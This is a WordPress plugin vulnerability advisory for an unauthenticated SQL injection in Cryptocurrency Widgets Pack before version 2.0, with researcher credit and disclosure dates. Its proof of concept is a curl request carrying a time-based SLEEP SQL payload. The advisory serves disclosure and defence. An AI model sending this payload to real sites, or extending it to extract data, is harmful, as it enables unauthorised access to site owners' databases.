WordPress Plugin Vulnerabilities
Cryptocurrency Widgets Pack < 2.0 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Proof of Concept
Invoke the following curl command to induce a 5 seconds sleep: time curl 'https://exampe.com/wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order\[0\]\[column\]=0&columns\[0\]\[name\]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))aaaa)--+-'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-09 (about 1 years ago)
Added
2022-12-09 (about 1 years ago)
Last Updated
2023-07-07 (about 10 months ago)